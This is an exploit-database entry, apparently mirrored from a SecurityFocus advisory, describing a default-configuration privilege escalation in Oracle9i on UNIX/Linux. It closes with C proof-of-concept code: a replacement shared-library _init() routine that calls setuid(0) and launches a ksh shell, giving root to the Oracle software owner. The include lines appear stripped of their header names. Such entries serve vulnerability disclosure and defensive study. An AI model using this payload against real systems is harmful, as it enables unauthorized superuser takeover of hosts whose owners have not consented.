Oracle9i Database - Default Library Directory Privilege Escalation

2004-07-30T00:00:00
ID EXPLOITPACK:E343F9DFD843491BA88E469FBB6CE81E
Type exploitpack
Reporter Juan Manuel Pascual Escribá
Modified 2004-07-30T00:00:00

Description

Oracle9i Database - Default Library Directory Privilege Escalation

                                        
                                            source: https://www.securityfocus.com/bid/10829/info

Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.

This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.

It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.

#include
#include

_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}